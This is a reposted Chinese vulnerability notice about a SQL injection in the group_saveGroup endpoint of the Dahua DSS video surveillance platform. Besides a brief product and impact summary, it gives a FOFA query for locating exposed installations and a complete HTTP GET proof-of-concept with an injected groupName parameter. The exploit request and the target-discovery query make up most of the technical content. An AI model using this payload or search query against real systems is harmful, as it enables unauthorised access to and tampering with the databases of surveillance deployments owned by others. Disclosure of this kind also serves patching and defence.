大华DSS 视频管理系统存在group_saveGroup注入

admin 2024年8月25日20:22:53评论42 views字数 573阅读1分54秒阅读模式

产品简介

DSS是大华的大型监控管理应用平台,支持几乎所有涉及监控等方面的操作,支持多级跨平台联网等操作。可将视频监控、卡口拍照、 区间测速 、电子地图、违章查询系统等诸多主流应用整合在一起,实现更加智能、便捷的分级查询服务。

大华DSS 视频管理系统存在group_saveGroup注入

漏洞概述

大华DSS某接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。

FOFA

app="dahua-DSS"

大华DSS 视频管理系统存在group_saveGroup注入

POC

GET
/emap/group_saveGroup?groupName=1%27+AND+2103%3D2103+AND+%27xvPq%2
7%3D%27xvPq HTTP/1.1
Host:
Accept-Encoding: identity
Accept-Language: zh-CN,zh;q=0.8
Accept: */* User-Agent: Mozilla/5.0 (Windows NT 5.1;
rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Cache-Control: max-age=

原文始发于微信公众号(7coinSec):大华DSS 视频管理系统存在group_saveGroup注入

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月25日20:22:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   大华DSS 视频管理系统存在group_saveGroup注入https://cn-sec.com/archives/3094504.html

发表评论

匿名网友 填写信息